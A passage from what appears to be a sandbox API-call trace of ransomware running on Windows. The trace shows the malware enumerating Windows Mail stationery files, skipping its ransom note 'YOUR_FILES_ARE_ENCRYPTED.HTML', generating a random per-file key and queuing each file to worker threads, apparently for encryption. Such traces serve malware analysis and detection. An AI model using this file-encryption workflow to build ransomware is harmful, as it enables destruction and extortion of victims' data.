param_2="%02X" | out: param_1="90") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="AB") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="A4") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="D2") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="B0") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="77") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="39") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="7B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="34") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="8B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="FC") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="45") returned 2 [0163.794] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" [0163.794] CreateIoCompletionPort (FileHandle=0x5b0, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.794] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0163.794] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f57aa4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Orange Circles.htm", cAlternateFileName="ORANGE~1.HTM")) returned 1 [0163.794] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm") returned 90 [0163.794] lstrcmpW (lpString1="Orange Circles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.794] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0163.794] lstrlenW (lpString=".htm") returned 4 [0163.794] PathFindExtensionW (pszPath="Orange Circles.htm") returned=".htm" [0163.794] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.794] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Orange Circles.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0163.794] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.794] CloseHandle (hObject=0x5ac) returned 1 [0163.795] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8283f59c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="OrangeCircles.jpg", cAlternateFileName="ORANGE~1.JPG")) returned 1 [0163.795] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned 89 [0163.795] lstrcmpW (lpString1="OrangeCircles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.795] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0163.795] lstrlenW (lpString=".jpg") returned 4 [0163.795] PathFindExtensionW (pszPath="OrangeCircles.jpg") returned=".jpg" [0163.795] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0163.795] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6381) returned 1 [0163.795] GetProcessHeap () returned 0x270000 [0163.795] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x750a170 [0163.799] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="94") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="1D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="E0") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="A2") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="A1") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CD") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="6B") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="34") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="79") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="4D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="1D") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="C3") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="03") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="64") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="FF") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="79") returned 2 [0163.799] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="6E") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="5D") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="29") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="76") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="47") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="EE") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="63") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="81") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="94") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="85") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="A6") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="F0") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="6E") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="A1") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="1C") returned 2 [0163.800] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="3A") returned 2 [0163.801] lstrcpyW (in: lpString1=0x751a224, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\OrangeCircles.jpg" [0163.801] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x750a170, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.801] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x750a170, lpOverlapped=0x750a170) returned 1 [0163.801] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41fa3d64, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.htm", cAlternateFileName="")) returned 1 [0163.801] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm") returned 83 [0163.801] lstrcmpW (lpString1="Peacock.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.801] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0163.801] lstrlenW (lpString=".htm") returned 4 [0163.801] PathFindExtensionW (pszPath="Peacock.htm") returned=".htm" [0163.801] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.801] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0163.801] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=232) returned 1 [0163.801] CloseHandle (hObject=0x5b4) returned 1 [0163.801] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828d7b1c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x13fb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Peacock.jpg", cAlternateFileName="")) returned 1 [0163.802] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned 83 [0163.802] lstrcmpW (lpString1="Peacock.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.802] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0163.802] lstrlenW (lpString=".jpg") returned 4 [0163.802] PathFindExtensionW (pszPath="Peacock.jpg") returned=".jpg" [0163.802] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b4 [0163.802] GetFileSizeEx (in: hFile=0x5b4, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=5115) returned 1 [0163.802] GetProcessHeap () returned 0x270000 [0163.802] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75322c8 [0163.806] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="BA") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="D8") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="66") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="40") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="82") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="EC") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="7D") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="40") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="08") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="A1") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A1") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="99") returned 2 [0163.806] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="32") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="59") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="76") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="6E") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="7A") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="DF") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="81") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="C5") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="27") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="89") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="DB") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="8F") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="59") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="42") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="20") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="A5") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="93") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="46") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="16") returned 2 [0163.807] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="03") returned 2 [0163.808] lstrcpyW (in: lpString1=0x754237c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Peacock.jpg" [0163.808] CreateIoCompletionPort (FileHandle=0x5b4, ExistingCompletionPort=0x3a0, CompletionKey=0x75322c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.808] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75322c8, lpOverlapped=0x75322c8) returned 1 [0163.808] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd263de50, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd263de50, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ff0024, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.htm", cAlternateFileName="")) returned 1 [0163.808] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm") returned 81 [0163.808] lstrcmpW (lpString1="Roses.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.808] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0163.808] lstrlenW (lpString=".htm") returned 4 [0163.808] PathFindExtensionW (pszPath="Roses.htm") returned=".htm" [0163.808] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0163.809] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=233) returned 1 [0163.809] CloseHandle (hObject=0x590) returned 1 [0163.809] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x828fdc7c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roses.jpg", cAlternateFileName="")) returned 1 [0163.809] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned 81 [0163.809] lstrcmpW (lpString1="Roses.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.809] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0163.809] lstrlenW (lpString=".jpg") returned 4 [0163.809] PathFindExtensionW (pszPath="Roses.jpg") returned=".jpg" [0163.809] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\roses.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0163.809] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1920) returned 1 [0163.809] GetProcessHeap () returned 0x270000 [0163.809] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x755a420 [0163.813] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="49") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="DA") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="A0") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="B1") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="F5") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="CC") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="0C") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="97") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="DE") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="54") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="D6") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="46") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="10") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="42") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="24") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="F4") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="AD") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="C7") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="4D") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="E8") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="53") returned 2 [0163.813] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="74") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="4F") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="AC") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="5A") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="EF") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="DF") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="30") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="5D") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="CA") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="2E") returned 2 [0163.814] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="6E") returned 2 [0163.814] lstrcpyW (in: lpString1=0x756a4d4, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Roses.jpg" [0163.814] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x755a420, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.814] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x755a420, lpOverlapped=0x755a420) returned 1 [0163.814] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x42016184, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Shades of Blue.htm", cAlternateFileName="SHADES~1.HTM")) returned 1 [0163.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm") returned 90 [0163.815] lstrcmpW (lpString1="Shades of Blue.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.815] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0163.815] lstrlenW (lpString=".htm") returned 4 [0163.815] PathFindExtensionW (pszPath="Shades of Blue.htm") returned=".htm" [0163.815] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Shades of Blue.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0163.815] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.815] CloseHandle (hObject=0x5a8) returned 1 [0163.815] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2617cf0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd2617cf0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82949f3c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x127e, dwReserved0=0x0, dwReserved1=0x0, cFileName="ShadesOfBlue.jpg", cAlternateFileName="SHADES~1.JPG")) returned 1 [0163.815] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\ShadesOfBlue.jpg") returned 88 [0163.815] lstrcmpW (lpString1="ShadesOfBlue.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.815] PathFindExtensionW (pszPath="ShadesOfBlue.jpg") returned=".jpg" [0163.815] lstrlenW (lpString=".jpg") returned 